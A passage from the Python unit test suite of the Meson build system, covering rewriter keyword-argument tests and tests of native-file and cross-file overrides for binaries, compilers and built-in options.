inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
if isinstance(v, (bool, int, float)):
f.write("{}={}\n".format(k, v))
elif isinstance(v, list):
f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v])))
else:
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We not have python2, check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
def test_user_options(self):
testcase = os.path.join(self.common_test_dir, '43 options')
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_user_options_command_line_overrides(self):
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_native_file({'project options': {'other_one': True}})
self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false'])
def test_user_options_subproject(self):
testcase = os.path.join(self.unit_test_dir, '79 user options for subproject')
s = os.path.join(testcase, 'subprojects')
if not os.path.exists(s):
os.mkdir(s)
s = os.path.join(s, 'sub')
if not os.path.exists(s):
sub = os.path.join(self.common_test_dir, '43 options')
shutil.copytree(sub, s)
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'sub:project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_option_bool(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'werror': True}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'werror' in each['name']:
self.assertEqual(each['value'], True)
break
else:
self.fail('Did not find werror in build options?')
def test_option_integer(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'unity_size': 100}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'unity_size' in each['name']:
self.assertEqual(each['value'], 100)
break
else:
self.fail('Did not find unity_size in build options?')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('Did not find werror in build options?')
def test_builtin_options_env_overrides_conf(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'})
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/bar'])
break
else:
self.fail('Did not find pkg_config_path in build options?')
def test_builtin_options_subprojects(self):
testcase = os.path.join(self.common_test_dir, '102 subproject subdir')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'c_args' in each['name']:
# This path will be hit twice, once for build and once for host,
self.assertEqual(each['value'], ['-Dfoo'])
found += 1
elif each['name'] == 'default_library':
self.assertEqual(each['value'], 'both')
found += 1
elif each['name'] == 'sub:default_library':
self.assertEqual(each['value'], 'static')
found += 1
self.assertEqual(found, 4, 'Did not find all three sections')
def test_builtin_options_subprojects_overrides_buildfiles(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertIn(cm.exception.stdout, 'Parent should override default_library')
def test_builtin_options_subprojects_inherits_parent_override(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertIn(cm.exception.stdout, 'Parent should override default_library')
def test_builtin_options_compiler_properties(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'c_args': ['-DFOO']},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DFOO'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_compiler_properties_legacy(self):
# The legacy placement in properties is still valid if a 'built-in
# options' setting is present, but doesn't have the lang_args
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DBAR'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_paths(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'bindir': 'foo'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'foo')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def setUp(self):
super().setUp()
self.current_config = 0
self.current_wrapper = 0
def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
exe_wrapper: T.Optional[T.List[str]] = None) -> str:
if is_windows():
raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
return textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
{}
[properties]
needs_exe_wrapper = {}
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc,
'exe_wrapper = {}'.format(str(exe_wrapper)) if exe_wrapper is not None else '',
needs_exe_wrapper))
def _stub_exe_wrapper(self) -> str:
return textwrap.dedent('''\
#!/usr/bin/env python3
import subprocess
import sys
sys.exit(subprocess.run(sys.argv[1:]).returncode)
''')
def test_needs_exe_wrapper_true(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
def test_needs_exe_wrapper_false(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=False))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertNotRegex(out, r'Skipped:\s*1\n')
def test_needs_exe_wrapper_true_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
s = Path(d) / 'wrapper.py'
with s.open('wt') as f:
f.write(self._stub_exe_wrapper())
s.chmod(0o774)
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(
needs_exe_wrapper=True,
exe_wrapper=[str(s)]))
self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
out = self.run_target('test')
self.assertRegex(out, r'Ok:\s*3\s*\n')
def test_cross_exe_passed_no_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
self.build()
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
# The test uses mocking and thus requires that the current process is the
# one to run the Meson steps. If we are using an external test executable
# (most commonly in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = self._cross_file_generator()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, os mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def helper_create_cross_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_user_options(self):
# This is just a touch test for cross file, since the implementation
# shares code after loading from the files
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--cross-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--cross-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('No c++ standard set?')
def test_builtin_options_per_machine(self):
"""Test options that are allowed to be set on a per-machine basis.
Such options could be passed twice, once for the build machine, and
once for the host machine. I've picked pkg-config path, but any would
do that can be set for both.
"""
testcase = os.path.join(self.common_test_dir, '2 cpp')
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}})
native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}})
# Ensure that PKG_CONFIG_PATH is not set in the environment
with mock.patch.dict('os.environ'):
for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']:
try:
del os.environ[k]
except KeyError:
pass
